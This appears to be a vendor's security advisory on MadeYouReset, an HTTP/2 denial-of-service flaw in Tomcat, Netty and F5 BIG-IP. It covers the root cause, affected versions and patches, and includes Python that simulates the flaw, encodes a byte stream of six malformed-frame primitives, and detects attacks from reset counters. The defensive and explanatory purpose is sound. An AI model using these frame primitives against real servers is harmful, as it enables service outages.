
New MadeYouReset Exploit Bypasses HTTP/2 DoS Protections


A novel attack technique named MadeYouReset has been discovered, targeting multiple implementations of the HTTP/2 protocol. The flaw is rated 7.5 (High) on the CVSS scale and allows attackers to bypass existing mitigations and launch significant denial-of-service (DoS) attacks. The vulnerability is especially concerning because it circumvents the server-imposed limit on concurrent HTTP/2 streams per TCP connection (SETTINGS_MAX_CONCURRENT_STREAMS, commonly set to 100), which exists precisely to bound the amount of work a single connection can cause.


Vulnerability Details

The generic identifier CVE-2025-8671 has been assigned to this vulnerability class, which impacts several products, including Apache Tomcat (CVE-2025-48989), F5 BIG-IP (CVE-2025-54500), and Netty (CVE-2025-55163). The MadeYouReset attack sends malformed HTTP/2 control frames that make the server reset streams it has already started processing; because a reset stream no longer counts toward the concurrent-stream limit, a single connection can keep thousands of requests in flight at the backend, overwhelming the server and denying service to legitimate users. In some cases this causes significant increases in CPU usage and can lead to out-of-memory crashes.

MadeYouReset is an evolution of the 2023 “Rapid Reset” attack (CVE-2023-44487). Rapid Reset relied on the client sending RST_STREAM frames, so the mitigations deployed against it count client-initiated resets. MadeYouReset instead sends crafted malformed frames that manipulate the server into issuing the RST_STREAM itself, which those counters never see.


Root Cause

The root cause of MadeYouReset lies in a mismatch between the HTTP/2 specification and the internal architecture of many real-world web servers. The specification requires a server to answer a stream-level protocol violation with RST_STREAM, after which the stream is closed and no longer counts toward SETTINGS_MAX_CONCURRENT_STREAMS. In many implementations, however, the request that was already handed to the backend keeps running after the reset, so the protocol layer's count of open streams and the backend's count of in-flight work drift apart; repeating this thousands of times exhausts resources and produces a DoS. The vulnerability leverages the fact that the RST_STREAM frame is used both for client-initiated cancellation and to signal stream errors, so a reset the server sends on its own behalf is invisible to mitigations that only count the resets a client sends.
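The following toy model, added here and not taken from any of the affected projects, makes the mismatch concrete. It keeps the two views a real server keeps (the protocol layer's open streams and the backend's in-flight requests) and runs a burst of open-then-reset streams three ways: client-sent RST_STREAM (Rapid Reset), server-forced RST_STREAM (MadeYouReset), and server-forced RST_STREAM on a connection that caps how many streams the server will reset before closing. The cap, `max_server_resets`, is an assumed hardening knob for illustration, not the specific change any vendor shipped.

```python
MAX_CONCURRENT_STREAMS = 100   # value the server advertises in SETTINGS_MAX_CONCURRENT_STREAMS


class ServerConnection:
    """Toy model of one server-side HTTP/2 connection (constructed for illustration).

    Two views that a real server also keeps, usually in different components:
    the protocol layer's set of open streams (what the concurrent-stream limit counts)
    and the backend's set of requests still being processed. max_server_resets is an
    assumed hardening knob, not any specific project's patch: when set, the connection
    is closed once the server has had to reset that many streams.
    """

    def __init__(self, max_server_resets=None):
        self.open_streams = set()        # counted against MAX_CONCURRENT_STREAMS
        self.backend_inflight = set()    # requests a worker is still executing
        self.client_resets = 0           # RST_STREAM received (what Rapid Reset counters see)
        self.server_resets = 0           # RST_STREAM sent because of a stream error
        self.max_server_resets = max_server_resets
        self.closed = False              # True once the server has sent GOAWAY

    def on_request(self, sid):
        """Client opens a stream with a complete request; a backend worker picks it up."""
        if self.closed or len(self.open_streams) >= MAX_CONCURRENT_STREAMS:
            return False                 # refused: the limit does its job for open streams
        self.open_streams.add(sid)
        self.backend_inflight.add(sid)
        return True

    def on_client_rst(self, sid):
        """Client cancels the stream (Rapid Reset); a server that honours cancellation
        also drops the backend work, so in-flight requests do not pile up."""
        self.client_resets += 1
        self.open_streams.discard(sid)
        self.backend_inflight.discard(sid)

    def on_stream_error(self, sid):
        """Malformed frame on sid: the spec says reply with RST_STREAM and close the stream.

        The slot is released from the protocol layer's point of view, but nothing tells
        the backend to stop. That is the MadeYouReset gap."""
        self.server_resets += 1
        self.open_streams.discard(sid)
        if self.max_server_resets is not None and self.server_resets > self.max_server_resets:
            self.closed = True           # hardened server: GOAWAY, stop accepting streams

    def finish(self, sid):
        """Backend completed the request (never reached during a fast attack burst)."""
        self.backend_inflight.discard(sid)


def run_attack(n_requests, client_sends_rst, max_server_resets=None):
    """Open n_requests streams and immediately reset each one, either by having the
    client send RST_STREAM (Rapid Reset) or by sending a malformed frame so the server
    must (MadeYouReset). Returns the counters a defender would want to compare."""
    conn = ServerConnection(max_server_resets)
    accepted = peak_open = 0
    for i in range(n_requests):
        sid = 2 * i + 1                  # client-initiated streams use odd identifiers
        if not conn.on_request(sid):
            continue
        accepted += 1
        peak_open = max(peak_open, len(conn.open_streams))
        if client_sends_rst:
            conn.on_client_rst(sid)
        else:
            conn.on_stream_error(sid)    # e.g. WINDOW_UPDATE with increment 0 on sid
    return {
        "accepted": accepted,
        "peak_open": peak_open,
        "backend_inflight": len(conn.backend_inflight),
        "client_resets": conn.client_resets,
        "server_resets": conn.server_resets,
        "connection_closed": conn.closed,
    }


if __name__ == "__main__":
    print("rapid reset   :", run_attack(5000, client_sends_rst=True))
    print("made you reset:", run_attack(5000, client_sends_rst=False))
    print("hardened      :", run_attack(5000, client_sends_rst=False, max_server_resets=200))
```

In the MadeYouReset run the protocol layer never sees more than one open stream, so the 100-stream limit is never hit, yet the backend ends up with all 5000 requests in flight. The hardened run accepts only 201 streams before the connection is closed, which is the property the patches restore: server-initiated resets must be accounted for just like client-initiated ones.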


Proof of Concept (PoC)

To trigger the RST_STREAM frames on the server, attackers can use the following primitives:

1. WINDOW_UPDATE frame with an increment of 0
2. PRIORITY frame whose length is not 5 (the only valid length for it)
3. PRIORITY frame that makes a stream dependent on itself
4. WINDOW_UPDATE frame with an increment that makes the window exceed 2^31 - 1 (the largest window size allowed)
5. HEADERS frame sent after the client has closed the stream (via the END_STREAM flag)
6. DATA frame sent after the client has closed the stream (via the END_STREAM flag)

Each of these is a stream-level protocol violation, so a spec-compliant server answers by sending RST_STREAM on that stream rather than tearing down the whole connection; the attacker never has to send an RST_STREAM frame of its own.
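To show the exchange on the wire, here is an added example (not code from the researchers or from any affected project) that encodes raw HTTP/2 frames, builds a constructed client byte stream containing each of the six primitives on its own stream, and models the receiving side just far enough to say which RST_STREAM error code a spec-compliant server sends back. The model handles only stream-level checks from RFC 9113; stream 0, SETTINGS and HPACK decoding are deliberately out of scope, and the HPACK bytes in the request are the static-table indices for a minimal GET.

```python
import struct

# Frame types and flags (RFC 9113, section 6)
DATA, HEADERS, PRIORITY, RST_STREAM, WINDOW_UPDATE = 0x0, 0x1, 0x2, 0x3, 0x8
END_STREAM = 0x1
# Error codes (RFC 9113, section 7)
PROTOCOL_ERROR, FLOW_CONTROL_ERROR, STREAM_CLOSED, FRAME_SIZE_ERROR = 0x1, 0x3, 0x5, 0x6
MAX_WINDOW = 2**31 - 1          # largest flow-control window the spec allows
INITIAL_WINDOW = 65535          # default per-stream window


def frame(ftype, flags, stream_id, payload=b""):
    """Encode one HTTP/2 frame: 24-bit length, 8-bit type, 8-bit flags, 31-bit stream id."""
    return (len(payload).to_bytes(3, "big") + bytes([ftype, flags])
            + struct.pack("!I", stream_id & 0x7FFFFFFF) + payload)


def parse_frames(buf):
    """Split a raw byte stream into (type, flags, stream_id, payload) tuples."""
    frames, off = [], 0
    while off + 9 <= len(buf):
        length = int.from_bytes(buf[off:off + 3], "big")
        ftype, flags = buf[off + 3], buf[off + 4]
        sid = struct.unpack("!I", buf[off + 5:off + 9])[0] & 0x7FFFFFFF
        frames.append((ftype, flags, sid, buf[off + 9:off + 9 + length]))
        off += 9 + length
    return frames


def server_resets(buf):
    """Model the receiving side: return the (stream_id, error_code) pairs for which a
    spec-compliant server sends RST_STREAM. Stream 0, HPACK and SETTINGS are not modelled."""
    remote_closed, windows, reset_ids, resets = set(), {}, set(), []
    for ftype, flags, sid, payload in parse_frames(buf):
        if sid == 0 or sid in reset_ids:
            continue                      # a reset stream is closed; later frames are dropped
        err = None
        if ftype in (HEADERS, DATA) and sid in remote_closed:
            err = STREAM_CLOSED           # primitives 5 and 6: frame after END_STREAM
        elif ftype == PRIORITY:
            if len(payload) != 5:
                err = FRAME_SIZE_ERROR    # primitive 2: PRIORITY must be exactly 5 bytes
            elif struct.unpack("!I", payload[:4])[0] & 0x7FFFFFFF == sid:
                err = PROTOCOL_ERROR      # primitive 3: a stream may not depend on itself
        elif ftype == WINDOW_UPDATE:
            inc = struct.unpack("!I", payload[:4])[0] & 0x7FFFFFFF
            window = windows.get(sid, INITIAL_WINDOW)
            if inc == 0:
                err = PROTOCOL_ERROR      # primitive 1: zero increment is not allowed
            elif window + inc > MAX_WINDOW:
                err = FLOW_CONTROL_ERROR  # primitive 4: window would exceed 2^31 - 1
            else:
                windows[sid] = window + inc
        if err is not None:
            resets.append((sid, err))
            reset_ids.add(sid)
        elif ftype in (HEADERS, DATA) and flags & END_STREAM:
            remote_closed.add(sid)        # client half-closed: no more HEADERS/DATA allowed
    return resets


def six_primitives():
    """Constructed client byte stream: a complete request on each odd stream, followed by
    one of the six primitives. The HPACK block is the static-table indices for
    ':method GET', ':path /' and ':scheme https'; the model above does not decode it."""
    def request(sid):
        return frame(HEADERS, END_STREAM, sid, b"\x82\x84\x87")
    return b"".join([
        request(1), frame(WINDOW_UPDATE, 0, 1, struct.pack("!I", 0)),           # 1
        request(3), frame(PRIORITY, 0, 3, b"\x00\x00\x00\x00"),                  # 2 (4 bytes)
        request(5), frame(PRIORITY, 0, 5, struct.pack("!I", 5) + b"\x10"),       # 3 (dep = 5)
        request(7), frame(WINDOW_UPDATE, 0, 7, struct.pack("!I", MAX_WINDOW)),   # 4
        request(9), request(9),                                                  # 5
        request(11), frame(DATA, END_STREAM, 11, b"x"),                          # 6
    ])


if __name__ == "__main__":
    for sid, code in server_resets(six_primitives()):
        print(f"stream {sid}: server sends RST_STREAM error=0x{code:x}")
```

Every primitive costs the attacker one small frame after a complete request, and every one is answered with a stream reset rather than a connection error. The error codes differ (PROTOCOL_ERROR, FRAME_SIZE_ERROR, FLOW_CONTROL_ERROR, STREAM_CLOSED), which is useful when checking server logs: a connection producing many server-sent RST_STREAMs with these codes, none of them CANCEL, is the signature of this attack rather than of Rapid Reset.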


Affected Products

The vulnerability affects multiple products:

F5 BIG-IP (CVE-2025-54500):

  • BIG-IP 17.x (versions 17.5.0-17.5.1 and 17.1.0-17.1.2)
  • BIG-IP 16.x (versions 16.1.0-16.1.6)
  • BIG-IP 15.x (versions 15.1.0-15.1.10)
  • BIG-IP Next products (version 20.3.0 and various SPK, CNF, and Kubernetes implementations)

Apache Tomcat (CVE-2025-48989):

  • Tomcat 11.0.0-M1 through 11.0.9
  • Tomcat 10.1.0-M1 through 10.1.43
  • Tomcat 9.0.0.M1 through 9.0.107
  • Older, EOL versions might also be affected

Netty (CVE-2025-55163):

  • Netty prior to 4.1.124.Final
  • Netty prior to 4.2.4.Final

Other affected projects include h2o and swift-nio-http2.


Tactics, Techniques, and Procedures (TTPs)

Attackers exploit malformed HTTP/2 control frames to bypass the maximum concurrent streams limit. By crafting specific invalid control frames or violating protocol sequencing, attackers can force servers to generate RST_STREAM frames while backend systems continue processing requests.

  • TA0040 – Impact: Exploit the vulnerability to cause a denial-of-service condition.

The specific technique and sub-technique employed are:

  • T1499 – Endpoint Denial of Service
  • T1499.003 – Application Exhaustion Flood


Impact & Exploit Potential

Successful exploitation of MadeYouReset can lead to severe consequences, including denial-of-service conditions for legitimate users and, in certain scenarios, out-of-memory crashes on the targeted server. This vulnerability is actively being exploited in the wild, making it a critical concern for organizations using the affected products.


Mitigation & Recommendations

The flaw has been patched in Netty 4.1.124.Final and 4.2.4.Final, as well as Apache Tomcat 11.0.10, 10.1.44 and 9.0.108.

F5 has released engineering hotfixes for the 17.x and 16.x branches:

  • Hotfix-BIGIP-17.5.1.0.80.7-ENG.iso
  • Hotfix-BIGIP-17.1.2.2.0.259.12-ENG.iso
  • Hotfix-BIGIP-16.1.6.0.27.3-ENG.iso

For systems where patching is not immediately feasible, F5 recommends disabling HTTP/2 and serving HTTP/1.1 only. Other mitigation strategies include implementing BIG-IP ASM/Advanced WAF DoS protection profiles with TPS and stress-based attributes, including Behavioral DoS Detection and Mitigation capabilities. System administrators should also monitor HTTP/2 profile statistics for signs of attack, such as a high number of RST_STREAM frames sent by the server relative to the number of streams opened, and a high number of WINDOW_UPDATE frames received.
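The statistics check above can be turned into a simple rule. The example below is added here and is not an F5 or Tomcat tool: it parses a constructed key=value counter format (invented for this example; map your own per-connection HTTP/2 counters onto the same fields) and labels each connection by which side is doing the resetting. A connection where the server sent most of the RST_STREAMs fits MadeYouReset; one where the client sent them fits Rapid Reset. The thresholds are illustrative.

```python
import re

# Constructed sample of per-connection HTTP/2 counters. The key=value line format is
# invented for this example; only the four counters matter.
SAMPLE_STATS = """\
ts=1723700000 conn=10.0.0.5:51000 streams_opened=120 rst_recv=0 rst_sent=1 window_update_recv=30
ts=1723700000 conn=10.0.0.6:51001 streams_opened=3500 rst_recv=0 rst_sent=3490 window_update_recv=3500
ts=1723700000 conn=10.0.0.7:51002 streams_opened=800 rst_recv=790 rst_sent=2 window_update_recv=5
ts=1723700000 conn=10.0.0.8:51003 streams_opened=40 rst_recv=0 rst_sent=0 window_update_recv=0
"""

KV_RE = re.compile(r"(\w+)=(\S+)")


def parse_stats(text):
    """Turn each counter line into a dict; purely numeric fields become ints."""
    rows = []
    for line in text.splitlines():
        kv = dict(KV_RE.findall(line))
        if "conn" in kv:
            rows.append({k: int(v) if v.isdigit() else v for k, v in kv.items()})
    return rows


def classify(row, min_streams=100, reset_ratio=0.5):
    """Label one connection by who is doing the resetting.

    Rapid Reset shows up as the client sending most of the RST_STREAMs; MadeYouReset as
    the server sending them, typically alongside a flood of WINDOW_UPDATE (or other
    malformed) frames received. min_streams avoids judging idle connections."""
    opened = row["streams_opened"]
    if opened < min_streams:
        return "normal"                      # too little traffic to judge
    if row["rst_sent"] / opened >= reset_ratio:
        return "made_you_reset"
    if row["rst_recv"] / opened >= reset_ratio:
        return "rapid_reset"
    return "normal"


def find_suspects(text):
    """Return {conn: label} for every connection that is not classified as normal."""
    suspects = {}
    for row in parse_stats(text):
        label = classify(row)
        if label != "normal":
            suspects[row["conn"]] = label
    return suspects


if __name__ == "__main__":
    for conn, label in find_suspects(SAMPLE_STATS).items():
        print(f"{conn}: {label}")
```

The ratio of server-sent resets to streams opened is the discriminating signal: a healthy client almost never triggers stream errors, so even a modest fraction of server-initiated RST_STREAMs on a single connection deserves a look, and a ratio near one is an attack regardless of the absolute rate.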

Other generic recommendations include:

  • Ensuring that your HTTP/2 implementations are up-to-date with the latest security patches.
  • Implementing rate limiting to restrict the number of requests from a single client.
  • Monitoring server resources and setting up alerts for unusual activity.
  • Using a web application firewall (WAF) to filter out malicious requests.

Protecting against subtle attacks like MadeYouReset, which abuse behavior the specification requires of a server, is crucial, given that HTTP/2 is a fundamental component of modern web infrastructure.


Instantly Fix Risks with Saner Patch Management

Saner patch management is a continuous, automated, and integrated software platform that fixes risks exploited in the wild. It supports major operating systems (Windows, Linux, and macOS) as well as 550+ third-party applications.

It also allows you to set up a safe testing area to test patches before deploying them in a primary production environment. Saner patch management additionally supports a patch rollback feature in case of patch failure or a system malfunction.

Experience the fastest and most accurate patching software here.